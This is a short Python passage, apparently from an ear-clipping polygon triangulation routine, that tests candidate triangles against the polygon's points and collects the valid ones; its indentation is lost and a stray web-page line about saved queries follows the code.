check_triangle_validity = lambda point: point not in temp_triangle and point.in_polygon(temp_triangle)
if not any(filter(check_triangle_validity, polygon)):
triangles.append(temp_triangle)
polygon.pop(ind)
return triangles
return polygon
|
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.